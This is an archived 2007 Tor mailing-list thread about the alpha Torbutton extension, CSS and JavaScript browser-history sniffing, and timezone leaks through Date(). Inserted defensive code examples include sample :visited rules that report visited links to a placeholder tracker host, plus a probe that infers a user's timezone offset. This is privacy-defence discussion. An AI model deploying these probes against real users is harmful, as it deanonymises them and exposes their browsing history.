Re: Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread Mike Perry
Thus spake light zoo ([EMAIL PROTECTED]):

> > The result of this mad vision quest is a new and
> > improved Torbutton.
> 
> Excellent work 
> 
> BTW, what do I have to eat to have a "mad vision
> quest" like yours? ;-)

Was going to wait 2 hours to answer this, but what the hell, it's
already tomorrow according to my Torbutton extension ;). Happy new
year!

The key to Illumination is not so much what you eat, it's more so what
you don't eat. First, you have to purge your diet of all processed
foods and chemical additives. This is the first step in freeing
yourself from the stranglehold of poor health inflicted upon the
masses by the Dark Illuminati in order to better subjugate them. Right
now I'm drinking a nice tall glass of unpasteurized, unhomogenized
milk. Yum.

Once you purify the body it is time to purify the mind. This is
accomplished by staring Death in the face. Only by realizing that when
you die, your existence is no more than the set of desires you
manifest at the moment of death, are you able to achieve immortality.
Write your 5 core personal values on a sheet of paper right now! Do
not hesitate. Now burn this paper. This is the secret of the Dalai Lama
and the key to immortality. Use it well.

Once the mind is clean, it is time to purify the spirit. Every week
for N weeks or until you get bored you must devote yourself fully to a
new deity. Yin, Yang, Yahweh, Allah, Gozer, Baphomet, Chaos, Chronos,
Eros, Erebus, Nyx, Bob, Xenu, Yoda, and Lord Sidius are all excellent
choices. Once you realize the power of devotion is not to pray to a
god, or beg them to help you, but instead to channel their Force
through you to effect change in the world, you unify with that deity,
and are thus enlightened in selfless pursuit of the one Unifying
Force: Change.

That's it. That's all you need to know. I hereby dub you Illuminated.
You shall now henceforth be known as Sir Renegade Buddhist Light Zoo.


Watch out, the inmates are running the asylum.

http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs


Re: Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread Mike Perry
Thus spake Mike Perry ([EMAIL PROTECTED]):

> Also, it appears that we also need to hook
> document.defaultView.getComputedStyle(link,null).getPropertyValue();
> somehow (perhaps by hooking getComputedStyle and clearing all
> properties for its return value if it is an "A" tag like I do with
> document.getElement*, or possibly by hooking the getPropertyValue
> method on the returned object) in order to defeat
> http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

No, this is stupid. The adversary can just walk the DOM and look for A
tags. You have to be pro-active and walk the whole DOM first yourself,
and strip the attributes off of each A tag as you find it.

Or, perhaps getting the history clearing thing to work is the real
Ultimate Solution. You can use fileio in javascript to read
history.dat (see jshooks.js), but the main issue is file locking on
windows may prevent you from writing it out again since it appears firefox
never actually closes the file. It's worth a shot though. Perhaps they
don't lock the file while they have it open, and maybe they seek to the
beginning of it each time they read it out...

Ok, I promise I won't reply to myself any more. ;)

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs


Re: Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread light zoo

--- Mike Perry <[EMAIL PROTECTED]> wrote:

> The result of this mad vision quest is a new and
> improved Torbutton.

Excellent work 

BTW, what do I have to eat to have a "mad vision
quest" like yours? ;-)


 



Re: Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread Mike Perry
Thus spake Mike Perry ([EMAIL PROTECTED]):

> The goal of this extension is to make javascript as safe as it can be
> to use over Tor, modulo browser vulnerabilities (which the FF people
> will actually fix.. They seem to enjoy arbitrary sites being able to
> query their history and search keywords, however.. That is a "feature").

The long-standing firefox bug is:
https://bugzilla.mozilla.org/show_bug.cgi?id=14

It should be noted that the reason commonly given for not fixing is
that they don't care about specific URLs being queried and would
rather have styles work properly (why not have both? Obviously they
haven't heard the phrase "Ultimate Solution" :). However Billy
Hoffman's talk at shmoocon pointed out that you can query 10s of
thousands of urls per second on a fast machine, more than enough to
troll for permutations of google keyword searches.


This is probably also worth investigating:
http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

That technique uses CSS to fetch background images for visited links.
Bear in mind that images probably can be encoded with unique IDs by
exit nodes, so this probably is relevant. 

It is possible to enumerate and edit CSS stylesheets using javascript,
so perhaps this can be eliminated with an additional hook in
jshooks.js as well, but there may be issues with getting an event
handler that fires at the right time. You can find archives of me
harassing the mozilla extensions people about event handlers at:
http://groups.google.com/group/mozilla.dev.extensions/browse_thread/thread/0bad4be7ec5ca99b/5525a6040a5395c8#5525a6040a5395c8


Also, it appears that we also need to hook
document.defaultView.getComputedStyle(link,null).getPropertyValue();
somehow (perhaps by hooking getComputedStyle and clearing all
properties for its return value if it is an "A" tag like I do with
document.getElement*, or possibly by hooking the getPropertyValue
method on the returned object) in order to defeat
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

This technique does not seem to work on FF2.0.0.3:
http://www.gnucitizen.org/projects/hscan-redux/poc.htm


Sorry I don't have time for this stuff right now, it is really
interesting and I wish I could do it. I should have more time in ~1
month (unless I discover one of these to be particularly low hanging
fruit and have some downtime on a train one day).



-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs
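The CSS-only probe linked in the message above works because a :visited rule that sets a background image makes the browser fetch that image only for links the user has actually visited, so the image request itself reports history. As an added illustration of the stylesheet hook the author is considering (example code, not from Torbutton or jshooks.js), the following checks stylesheet text for such rules and rewrites it with the fetching declarations removed; a browser version would iterate document.styleSheets instead of parsing text. The function names, the sample stylesheet and the tracker.example host are constructed for this example.

```javascript
// Added example, not Torbutton code: find and neutralise :visited rules that fetch a URL.
// Runs over raw CSS text so it can be exercised offline; all names here are this example's own.

// One-level rule matcher: "selector { declarations }". Nested @media blocks are not
// descended into, so a production version would need a real CSS parser.
function ruleRegex() { return /([^{}]+)\{([^{}]*)\}/g; }

const VISITED = /:visited\b/i;      // selector targets visited links
const FETCHES_URL = /url\s*\(/i;    // declaration would trigger a network fetch

function parseDeclarations(body) {
  return body.split(';')
    .map((d) => d.trim())
    .filter((d) => d.includes(':'))
    .map((d) => {
      const i = d.indexOf(':');
      return { property: d.slice(0, i).trim().toLowerCase(), value: d.slice(i + 1).trim() };
    });
}

// Lists every declaration under a :visited selector that references a url(), i.e. the
// declarations whose fetch would tell a remote host which links have been visited.
function findVisitedProbes(cssText) {
  const hits = [];
  const re = ruleRegex();
  let m;
  while ((m = re.exec(cssText)) !== null) {
    const selector = m[1].trim();
    if (!VISITED.test(selector)) continue;
    for (const d of parseDeclarations(m[2])) {
      if (FETCHES_URL.test(d.value)) hits.push({ selector, ...d });
    }
  }
  return hits;
}

// Rewrites the stylesheet with those declarations dropped; plain :visited colouring is kept
// because it causes no request on its own.
function neutralizeVisitedProbes(cssText) {
  return cssText.replace(ruleRegex(), (whole, selector, body) => {
    if (!VISITED.test(selector)) return whole;
    const kept = body.split(';').map((d) => d.trim()).filter((d) => d && !FETCHES_URL.test(d));
    return `${selector}{ ${kept.join('; ')}${kept.length ? ';' : ''} }`;
  });
}

// Constructed sample: two benign rules and two rules that would report visited state to
// tracker.example (a placeholder host) by fetching a per-link image.
const SAMPLE_CSS = `
a { color: blue; }
a:visited { color: purple; }
#probe a:visited { background: url(http://tracker.example/hit?id=1) no-repeat; }
a#q2:visited { background-image: url("http://tracker.example/hit?id=2"); }
`;

console.log(findVisitedProbes(SAMPLE_CSS));          // two hits, both on tracker.example
console.log(neutralizeVisitedProbes(SAMPLE_CSS));    // same sheet with the url() lines gone
```

The check deliberately keys on url() rather than on the background property alone, because any fetched resource (background, list-style-image, border-image, content) carries the same signal; a per-property allow-list would miss the next variant.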


Re: Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread Mike Perry
Thus spake Mike Perry ([EMAIL PROTECTED]):

> 1. It turns off browser plugins when you click a button in the statusbar,
>    and also whenever Tor is on.
> 
> 2. It clears your cookies whenever you toggle tor.
> 
> 3. It hooks "dangerous" javascript functions, including:
>    A. The Date() object, which can reveal your timezone
>    B. document.getElement* which can be used to probe CSS attributes
>       to see if you have visited certain sites or issued certain
>       google queries: http://gemal.dk/browserspy/css.html
>    C. navigator.oscpu and navigator.platform, two OS revealing strings
>       not managed by UserAgentSwitcher.
> 
> 4. It can optionally clear history whenever tor is toggled
>    (unfortunately saving non-tor history is not possible yet. Firefox
>    DOES have an API to do this, but it is "not implemented").

> KNOWN ISSUES (AKA HELP PLZ!):
> 
> This extension has been tested to work on FF2.0 and FF1.5. FF1.5
> unfortunately lacks a sane TabOpen event, so plugins are not properly
> disabled for new tabs when they open. FF2.0 seems ok.
> 
> I tried the code snippets for FF1.5 for this from
> http://developer.mozilla.org/en/docs/Code_snippets:Tabbed_browser
> but I was unable to get it to deliver events just for a tab, and I
> eventually gave up. I am not planning on supporting FF1.5 ever. If you
> like FF1.5, please submit a patch. It's possible I was just doing
> something dumb. I did only learn javascript 5 days ago :)
> 
> It might also be nice if someone changed that "J" graphic to a "P" for
> plugins, and also made a button for toggling the javascript.enabled
> pref (and hooked it up so it actually worked).

UNKNOWN ISSUES (AKA HELP PLZ!):

If there are any javascript gurus on the list (or if anyone has the
time to do the research to become one, it doesn't take that long and
is the path to Real Ultimate Power ;), we need to consider if there
are any other javascript issues that we should be concerned about. 

Researching techniques on http://gemal.dk/browserspy/ is a good place
to start. http://en.wikipedia.org/wiki/XMLHttpRequest and
http://developer.mozilla.org/en/docs/Gecko_DOM_Reference can't hurt
either.

Obviously all sorts of AJAX/XMLHttpRequest stuff can be done by exit
nodes to steal your sessions and such, but they can do that with plain
old cookies anyways. Presumably for anything that matters, you either
use https, disable js, or don't use that site.

Interestingly enough, Tor DOES protect you from JS doing crazy things
like reconfiguring your router and portscanning your intranet (yes,
this CAN be done), since JS will always use proxy settings (modulo
browser vulnerabilities). So hey, we can claim we do in fact provide
some added security! ;)



-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs


Securing teh Intarwebs (Ultimate Solution ;)

2007-03-31 Thread Mike Perry
So I've spent the last week buried in javascript, xml, xbl, and
something pronounced "Zool". I seem to have survived, but it is quite
possible I may turn into a fire breathing demondog at any moment. Hail
Gozer.

The result of this mad vision quest is a new and improved Torbutton.
Based off of TorButton 1.0.4, it has the following additional features:

1. It turns off browser plugins when you click a button in the statusbar,
   and also whenever Tor is on.

2. It clears your cookies whenever you toggle tor.

3. It hooks "dangerous" javascript functions, including:
   A. The Date() object, which can reveal your timezone
   B. document.getElement* which can be used to probe CSS attributes
      to see if you have visited certain sites or issued certain
      google queries: http://gemal.dk/browserspy/css.html
   C. navigator.oscpu and navigator.platform, two OS revealing strings
      not managed by UserAgentSwitcher.

4. It can optionally clear history whenever tor is toggled
   (unfortunately saving non-tor history is not possible yet. Firefox
   DOES have an API to do this, but it is "not implemented").


http://fscked.org/proj/minihax/TorButton/TorButton-1.1.0-alpha-dev.xpi

The goal of this extension is to make javascript as safe as it can be
to use over Tor, modulo browser vulnerabilities (which the FF people
will actually fix.. They seem to enjoy arbitrary sites being able to
query their history and search keywords, however.. That is a "feature").


ALPHA WARNING:

This is ALPHA software. It desperately needs someone to review it and
to try to break it. Especially the Date hooks. Those are complicated,
and feeding Date various malformed strings to parse may cause it to
generate a time with an offset from the actual time that reveals your
timezone, among other issues. I tried my best to guard against these
types of issues, but it could really use another pair of eyes. Or
several.

Additionally, it would be nice if someone could verify that popups,
iframes, frames, and other crazy gimpy windows properly hook Date()
and disable plugins. I tested iframes and frames briefly, but I did
not test popups.


ABANDONWARE WARNING:

I am not terribly interested in maintaining this extension. Especially
not for the next month or so. However, I will consider fixing serious
bugs involving my hooks of Date(), but likely not in any timely
fashion. If absolutely nothing happens with this after a month, I will
add it to my pile of responsibilities. But I should probably find the
time to pay my utilities first. I'm really hoping Scott will pick up my
changes and continue maintaining this extension.


KNOWN ISSUES (AKA HELP PLZ!):

This extension has been tested to work on FF2.0 and FF1.5. FF1.5
unfortunately lacks a sane TabOpen event, so plugins are not properly
disabled for new tabs when they open. FF2.0 seems ok.

I tried the code snippets for FF1.5 for this from
http://developer.mozilla.org/en/docs/Code_snippets:Tabbed_browser
but I was unable to get it to deliver events just for a tab, and I
eventually gave up. I am not planning on supporting FF1.5 ever. If you
like FF1.5, please submit a patch. It's possible I was just doing
something dumb. I did only learn javascript 5 days ago :)

It might also be nice if someone changed that "J" graphic to a "P" for
plugins, and also made a button for toggling the javascript.enabled
pref (and hooked it up so it actually worked).


BRIEF EXPLANATION OF SOURCE:

XPIs are zips of jar files that contain javascript and xml. The jar
files themselves are also zips. The javascript hooking magic is done
in jshooks.js. The plugin toggling and events for javascript are in
torbutton.js.


Good luck!


-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs
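The Date() hooks are the part of the extension the announcement above most wants reviewed: a hooked Date that zeroes getTimezoneOffset() but still parses a zone-less string as local wall-clock time lets a page recover the offset by comparing the parsed instant with the UTC epoch of the same digits. As an added illustration (example code, not Torbutton's jshooks.js), here is a timezone-hiding Date wrapper together with a probe that measures what a page could still infer from it. The names TzSafeDate, inferOffsetMinutes and leakyInputs, the sample strings and the zone-detection regex are this example's own assumptions; the regex is a heuristic, not a complete grammar of what Date.parse accepts.

```javascript
// Added example, not Torbutton code: a Date wrapper that never exposes the host timezone,
// plus probes that report what a page could learn from a given Date constructor.

// Heuristic: does the string carry an explicit zone (Z, GMT/UTC, or +hh:mm / +hhmm)?
const HAS_ZONE = /(?:Z|GMT|UTC|[+-]\d{2}:?\d{2})\s*$/i;
// Date-only ISO strings ("2007-03-31") are already parsed as UTC by the engine.
const DATE_ONLY = /^\d{4}-\d{2}-\d{2}$/;

class TzSafeDate {
  constructor(...args) {
    if (args.length === 1 && typeof args[0] === 'string') {
      const s = args[0].trim();
      const parsed = new Date(s);
      if (HAS_ZONE.test(s) || DATE_ONLY.test(s)) {
        this._d = parsed;                       // instant is unambiguous, keep it
      } else {
        // Zone-less strings are parsed as local wall-clock time. Shifting by the local
        // offset at that instant re-interprets the same digits as UTC, so the host's
        // offset never enters the result. (Known edge: the hour around a DST switch.)
        this._d = new Date(parsed.getTime() - parsed.getTimezoneOffset() * 60000);
      }
    } else if (args.length >= 2) {
      this._d = new Date(Date.UTC(...args));    // component form is local too; build in UTC
    } else {
      this._d = args.length ? new Date(args[0]) : new Date();   // ms timestamp, Date, or now
    }
  }
  getTime() { return this._d.getTime(); }
  valueOf() { return this._d.getTime(); }
  getTimezoneOffset() { return 0; }             // always claim UTC
  getFullYear() { return this._d.getUTCFullYear(); }
  getMonth() { return this._d.getUTCMonth(); }
  getDate() { return this._d.getUTCDate(); }
  getDay() { return this._d.getUTCDay(); }
  getHours() { return this._d.getUTCHours(); }
  getMinutes() { return this._d.getUTCMinutes(); }
  getSeconds() { return this._d.getUTCSeconds(); }
  getUTCHours() { return this._d.getUTCHours(); }
  toString() { return this._d.toUTCString(); }  // no "GMT+0200 (CEST)" suffix
  toISOString() { return this._d.toISOString(); }
}

// What a page can learn: parse a zone-less string, then compare with the UTC epoch of the
// same digits. For the native Date this equals the host's getTimezoneOffset(); a safe
// wrapper must return 0 here regardless of what getTimezoneOffset() claims.
function inferOffsetMinutes(DateCtor) {
  const d = new DateCtor('March 31, 2007 12:00:00');
  return (d.getTime() - Date.UTC(2007, 2, 31, 12, 0, 0)) / 60000;
}

// Constructed inputs with the UTC instant each should denote once the zone is hidden.
const SAMPLES = [
  ['March 31, 2007 12:00:00',       Date.UTC(2007, 2, 31, 12)],
  ['2007-03-31T12:00:00',           Date.UTC(2007, 2, 31, 12)],
  ['2007-03-31T12:00:00Z',          Date.UTC(2007, 2, 31, 12)],
  ['Sat, 31 Mar 2007 12:00:00 GMT', Date.UTC(2007, 2, 31, 12)],
  ['2007-03-31T12:00:00+05:00',     Date.UTC(2007, 2, 31, 7)],
  ['2007-03-31',                    Date.UTC(2007, 2, 31)],
];

// Returns the inputs for which DateCtor yields an instant other than the expected one,
// i.e. the strings through which the host offset would still show.
function leakyInputs(DateCtor) {
  return SAMPLES.filter(([s, want]) => new DateCtor(s).getTime() !== want).map(([s]) => s);
}

console.log('native Date infers', inferOffsetMinutes(Date), 'min; leaky:', leakyInputs(Date));
console.log('TzSafeDate infers', inferOffsetMinutes(TzSafeDate), 'min; leaky:', leakyInputs(TzSafeDate));
```

Run it with TZ set to a non-UTC zone (for example TZ=Europe/Berlin node example.js) to see the native Date report the host offset through the first two strings while the wrapper reports 0 for all of them; under TZ=UTC both look clean, which is exactly why a review of such hooks has to be done with a non-zero offset.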


Re: Re[4]: Ultimate solution

2007-03-30 Thread Michael_google gmail_Gersten

Perhaps this is the way to think about it:

For some people, in some situations, perfect anonymity is needed, with
nothing less.

For other people, or other situations, "nearly" is good enough, based
on what you want to accomplish:
1. Preventing ISPs from tracking and selling your browsing history
2. Preventing third parties, such as ad sites, from doing the same
3. Preventing search engines from assembling your "search history",
and turning it over to the government.
4. Preventing sites that you don't log into from accumulating your
local browse history over time.

That's not perfect, but that's good enough for me.


Re: Re[4]: Ultimate solution

2007-03-30 Thread JT
I wasn't saying that anonymity is a binary but the user's behavior.
Either he is doing the best possible thing to be anonymous or he isn't!
See what I wrote! If he isn't then we don't care about the reason. He
forgot, sloppiness, etc.
Why not help him and force him to do the best possible thing to be
anonymous?

Understand now what I am trying to say?


> Security is NOT binary, it is a process, and it is a gradient. We only
> desire the illusion of it being binary. There is compromise in every
> design, take tor for example using 128bit crypto because it is pretty
> secure and fast enough to encrypt on the fly. I'm sure there are
> people that wish it was doing 512bit elliptic curve or some other
> thing out there.
> 
> However, it is possible we could come up with some secure-only mode
> which locks out most features, virtually all the plugins and
> functionality, and puts the user in a rigid framework in order to give
> a little more security and a stronger impression of anonymity. Of
> course, this makes it a significantly unpleasant experience and one
> might as well use lynx at that point.
> 
> Regards,
> Arrakis
> 
> >> As I said it is possible, but when you treat the user like a child it
> >> is going to be an issue to get them to keep using it.
> 
> > Why? Surfing anonymously is a binary. Either 1) everything is set
> > perfectly to be secure and anonymous or 2) it is not.
> > There are two types of Tor users. Tor literate and Tor illiterate users.
> > The thing that both have in common is that they could accidentally
> > enable scripting or forget to turn it off. Both types would be grateful
> > for a mechanism that would force them to turn things off and not allow
> > them to use Tor otherwise.
> 
> > After all they can choose to use Tor or not. Be anonymous or not be
> > anonymous. There is no third "state". Nobody would feel "being
> > treated as a child".
> > -- 
> >   JT
> >   [EMAIL PROTECTED]
> 
> 
> 
> 
-- 
  JT
  [EMAIL PROTECTED]




Re: Re[4]: Ultimate solution

2007-03-29 Thread Kasimir Gabert

Hello Arrakis,

I believe that JT was saying that there are binary options regarding
whether you are properly using TOR, or not properly using TOR.  You
are arguing that TOR itself is not considered "Security".  He is
saying that people who have deemed TOR to be secure and anonymous can
either be using TOR properly or could have scripting, or other similar
things enabled, and thus compromising what they have deemed as secure.

And there is a *huge* difference between disabling all scripting and
using Lynx.  Lynx has no scripts, but also no images, no frames, no
color choices, and a very small screen size.  You can browse just as
"securely" with a properly configured Mozilla client as you can with
Lynx.  The security does not come from not downloading pictures, which
is the main distinguishing factor when compared with Lynx, it comes
from disabling scripting.

Just my two cents,
Kasimir

On 3/29/07, Arrakis <[EMAIL PROTECTED]> wrote:
> JT,
> 
> Security is NOT binary, it is a process, and it is a gradient. We only
> desire the illusion of it being binary. There is compromise in every
> design, take tor for example using 128bit crypto because it is pretty
> secure and fast enough to encrypt on the fly. I'm sure there are
> people that wish it was doing 512bit elliptic curve or some other
> thing out there.
> 
> However, it is possible we could come up with some secure-only mode
> which locks out most features, virtually all the plugins and
> functionality, and puts the user in a rigid framework in order to give
> a little more security and a stronger impression of anonymity. Of
> course, this makes it a significantly unpleasant experience and one
> might as well use lynx at that point.
> 
> Regards,
> Arrakis
> 
> >> As I said it is possible, but when you treat the user like a child it
> >> is going to be an issue to get them to keep using it.
> 
> > Why? Surfing anonymously is a binary. Either 1) everything is set
> > perfectly to be secure and anonymous or 2) it is not.
> > There are two types of Tor users. Tor literate and Tor illiterate users.
> > The thing that both have in common is that they could accidentally
> > enable scripting or forget to turn it off. Both types would be grateful
> > for a mechanism that would force them to turn things off and not allow
> > them to use Tor otherwise.
> 
> > After all they can choose to use Tor or not. Be anonymous or not be
> > anonymous. There is no third "state". Nobody would feel "being
> > treated as a child".
> > --
> >   JT
> >   [EMAIL PROTECTED]

--
Kasimir Gabert


Re[4]: Ultimate solution

2007-03-29 Thread Arrakis
JT,

Security is NOT binary, it is a process, and it is a gradient. We only
desire the illusion of it being binary. There is compromise in every
design, take tor for example using 128bit crypto because it is pretty
secure and fast enough to encrypt on the fly. I'm sure there are
people that wish it was doing 512bit elliptic curve or some other
thing out there.

However, it is possible we could come up with some secure-only mode
which locks out most features, virtually all the plugins and
functionality, and puts the user in a rigid framework in order to give
a little more security and a stronger impression of anonymity. Of
course, this makes it a significantly unpleasant experience and one
might as well use lynx at that point.

Regards,
Arrakis

>> As I said it is possible, but when you treat the user like a child it
>> is going to be an issue to get them to keep using it.

> Why? Surfing anonymously is a binary. Either 1) everything is set
> perfectly to be secure and anonymous or 2) it is not.
> There are two types of Tor users. Tor literate and Tor illiterate users.
> The thing that both have in common is that they could accidentally
> enable scripting or forget to turn it off. Both types would be grateful
> for a mechanism that would force them to turn things off and not allow
> them to use Tor otherwise.

> After all they can choose to use Tor or not. Be anonymous or not be
> anonymous. There is no third "state". Nobody would feel "being
> treated as a child".
> -- 
>   JT
>   [EMAIL PROTECTED]






Re: Re[2]: Ultimate solution

2007-03-29 Thread JT
> As I said it is possible, but when you treat the user like a child it
> is going to be an issue to get them to keep using it.

Why? Surfing anonymously is a binary. Either 1) everything is set
perfectly to be secure and anonymous or 2) it is not.
There are two types of Tor users. Tor literate and Tor illiterate users.
The thing that both have in common is that they could accidentally
enable scripting or forget to turn it off. Both types would be grateful
for a mechanism that would force them to turn things off and not allow
them to use Tor otherwise.

After all they can choose to use Tor or not. Be anonymous or not be
anonymous. There is no third "state". Nobody would feel "being
treated as a child".
-- 
  JT
  [EMAIL PROTECTED]




Re: Re[2]: Ultimate solution

2007-03-28 Thread Michael_google gmail_Gersten

> 2. Where will this be displayed, and who is going to read it? (Simple usage
> instructions)


On the download page. On the "Configure Privacy" page. When you get
"By default, all scripting is blocked. Click here to configure safety
level of scripting" on the second or third web page you go to.


> 3. Why keep any cookies at all after a session? (Common cookies for the
> tracking sites)


After a session? How long do your sessions last? Mine last days.


> 6. I especially like #6, now how do we get the tor network to route this
> as an exit node?


It's my understanding that if you want a connection to x.y.z.t:p, and
x.y.z.t is running a tor node that permits exit on p, then you are
guaranteed to use x.y.z.t as your exit node.

What about "Even if I'm just a middleman" node? Does it still permit
local exit? (I don't know).

What about a trivial setup for "Allow anything to exit on my node". Or
even just "Allow web / ftp / SSH / secure mail (or whatever other
checkboxes are wanted) to exit on my node", without any bandwidth
sharing for the network (literally, just an exit-only configuration
to help others who are using tor). 100% secure, encrypted communication
without having to purchase an SSL certificate for your web site, or
having to deal with the "Do I need to translate this address to
add/remove www. at the beginning, all to keep their browser from
complaining, and redo that every year?".


Re[2]: Ultimate solution

2007-03-28 Thread Arrakis
Well it is possible, but as was stated before I don't think that
active content is the culprit.

It would work like this: Tor button is on automatically, meaning tor
is selected. In this mode noscript preferences are locked to global
deny. When Tor button is off, noscript prefs are unlocked, but block
by default.

As I said it is possible, but when you treat the user like a child it
is going to be an issue to get them to keep using it.

Regards,
Arrakis

> Is it really that difficult to test if active content is disabled?
> The Tor software should not work(i.e. the "start tor" button should not
> be clickable) if the user hasn't deactivated Javascript, Flash, Java,
> etc.
> Is this difficult to implement? There are not too many browsers.
> -- 
>   JT
>   [EMAIL PROTECTED]






Re: Ultimate solution

2007-03-27 Thread JT
Is it really that difficult to test if active content is disabled?
The Tor software should not work(i.e. the "start tor" button should not
be clickable) if the user hasn't deactivated Javascript, Flash, Java,
etc.
Is this difficult to implement? There are not too many browsers.
-- 
  JT
  [EMAIL PROTECTED]




Re[2]: Ultimate solution

2007-03-27 Thread Arrakis

1. People may not want to use it if it starts sharing their IP for
the network. Although, acting as a middleman may be a good compromise.
In Torpark 3.0, we can probably do most of these.

2. Where will this be displayed, and who is going to read it?

3. Why keep any cookies at all after a session?

4. Sure. We can do this with Torpark 3.0

5. Already covered

6. I especially like #6, now how do we get the tor network to route this
as an exit node? Well... it would be great that instead of hashes we
could name the onion addresses fully. So if you wanted to check if
torrify.com had an exit node you could use to access it, you could
simply do torrify.com.onion... a simple naming convention.


Regards,
Arrakis

> It sounds to me like we need:
> 1. Absolutely easy to use client software that automatically acts as a
> router/server
> -- Needs to determine the lower (upstream) bandwidth, and not clog it
> -- Needs to be able to prioritize local originating connections to
> eliminate the desire to run separate client and server tor processes
> -- -- This includes using as much upstream as the local origination
> needs, even if it means nearly starving all "through me" traffic
> -- -- This means getting flow control working inside Tor, unless I
> missed something.
> -- Needs to be able to work with dynamic IP transparently
> -- -- Tor currently does this if NO Address line is in the config
> file, but Vidalia insists on putting one in there anyways.

> 2. Simple instructions to end users
> -- Anonymity != privacy
> -- Things like flash, etc, can break privacy and reveal who you are
> -- Some sort of 'This is known to be safe, this is most likely unsafe,
> this is "maybe" ' list.

> 3. A preconfigured set of cookies for the major known cookie tracking
> sites (ads, etc), so that every Tor user looks the same.

> 4. Ideally a patch for Firefox. IE allows you to say "Accept 1st party
> cookies, reject 3rd party cookies." Safari allows you to say "Only
> accept cookies from sites I navigate to, but not from sites linked to
> them (Advertisements)". Firefox doesn't have that.

> 5. (Privoxy already strips referrer information, so that's not leaking
> your search history, etc, to third parties).

> ** 6 **. Since Tor will route to an exit node on the same machine as
> your target, giving end-to-end transparent encryption, some sort of
> push to get the major web sites to run at least a "local exit" tor
> node. In particular, we need an absolutely trivial, out of the box,
> "Local only, any port" tor exit config.


> On 3/27/07, Freemor <[EMAIL PROTECTED]> wrote:
>> On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
>> > You are making a very big mistake! In theory you are correct with what
>> > you are saying but you are assuming the total noob can learn how to surf
>> > anonymously but also give grandma a chance to surf anonymously. Grandma
>> > knows what a browser is but has never heard about encryption or TCP/IP.
>> >
>>
>> I think that if the information is geared to the new user that they will
>> be able to pick it up. You don't need to get all technical to explain
>> everything. You could just say "if your browser doesn't display the lock
>> icon, like when using a banking site, your communication is anonymous
>> but not confidential, and may reveal identifying information."
>>
>> I also think there is a real problem with the "a new user could never
>> understand this" thinking. One should never assume that one's audience is
>> less intelligent than you are. Also, even if the effort manages to only
>> educate 30% of the new users this is far superior to not making the
>> effort and having only the very enthusiastic users who have the skills
>> to dig up the documentation they need being educated.
>>
>> Freemor




Re: Ultimate solution

2007-03-27 Thread Michael_google gmail_Gersten

It sounds to me like we need:
1. Absolutely easy to use client software that automatically acts as a
router/server
-- Needs to determine the lower (upstream) bandwidth, and not clog it
-- Needs to be able to prioritize local originating connections to
eliminate the desire to run separate client and server tor processes
-- -- This includes using as much upstream as the local origination
needs, even if it means nearly starving all "through me" traffic
-- -- This means getting flow control working inside Tor, unless I
missed something.
-- Needs to be able to work with dynamic IP transparently
-- -- Tor currently does this if NO Address line is in the config
file, but Vidalia insists on putting one in there anyways.

2. Simple instructions to end users
-- Anonymity != privacy
-- Things like flash, etc, can break privacy and reveal who you are
-- Some sort of 'This is known to be safe, this is most likely unsafe,
this is "maybe" ' list.

3. A preconfigured set of cookies for the major known cookie tracking
sites (ads, etc), so that every Tor user looks the same.

4. Ideally a patch for Firefox. IE allows you to say "Accept 1st party
cookies, reject 3rd party cookies." Safari allows you to say "Only
accept cookies from sites I navigate to, but not from sites linked to
them (Advertisements)". Firefox doesn't have that.

5. (Privoxy already strips referrer information, so that's not leaking
your search history, etc, to third parties).

** 6 **. Since Tor will route to an exit node on the same machine as
your target, giving end-to-end transparent encryption, some sort of
push to get the major web sites to run at least a "local exit" tor
node. In particular, we need an absolutely trivial, out of the box,
"Local only, any port" tor exit config.


On 3/27/07, Freemor <[EMAIL PROTECTED]> wrote:

> On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
> > You are making a very big mistake! In theory you are correct with what
> > you are saying but you are assuming the total noob can learn how to surf
> > anonymously but also give grandma a chance to surf anonymously. Grandma
> > knows what a browser is but has never heard about encryption or TCP/IP.
> >
> 
> I think that if the information is geared to the new user that they will
> be able to pick it up. You don't need to get all technical to explain
> everything. You could just say "if your browser doesn't display the lock
> icon, like when using a banking site, your communication is anonymous
> but not confidential, and may reveal identifying information."
> 
> I also think there is a real problem with the "a new user could never
> understand this" thinking. One should never assume that one's audience is
> less intelligent than you are. Also, even if the effort manages to only
> educate 30% of the new users this is far superior to not making the
> effort and having only the very enthusiastic users who have the skills
> to dig up the documentation they need being educated.
> 
> Freemor


Re: Ultimate solution

2007-03-27 Thread Freemor
On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
> You are making a very big mistake! In theory you are correct with what
> you are saying but you are assuming the total noob can learn how to surf
> anonymously but also give grandma a chance to surf anonymously. Grandma
> knows what a browser is but has never heard about encryption or TCP/IP.
> 

I think that if the information is geared to the new user that they will
be able to pick it up. You don't need to get all technical to explain
everything. You could just say "if your browser doesn't display the lock
icon, like when using a banking site, your communication is anonymous
but not confidential, and may reveal identifying information."

I also think there is a real problem with the "a new user could never
understand this" thinking. One should never assume that one's audience is
less intelligent than you are. Also, even if the effort manages to only
educate 30% of the new users this is far superior to not making the
effort and having only the very enthusiastic users who have the skills
to dig up the documentation they need being educated.

Freemor





--

Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG


Re[4]: Ultimate solution

2007-03-27 Thread Arrakis

> How can the ratio of router/clients be improved? Every client must
> become a router. There is no other way. There must be a simple button
> "Yes, I want to be  an exit." or "No, I don't want to be an exit". I
> know this will take many, many hours of coding and I am not criticizing
> but wishful thinking won't get this great project anywhere. Yes, there
> are many nice people that run servers but the network will soon suffer a
> heart attack as the number of clients grows much faster than the number
> of routers.

I could add this function to Torpark, if:
1) A lot of people want it
2) TOR project implements directory distribution that can use these
temporary middleman and exit nodes as a positive, rather than
depending on long-lived nodes.

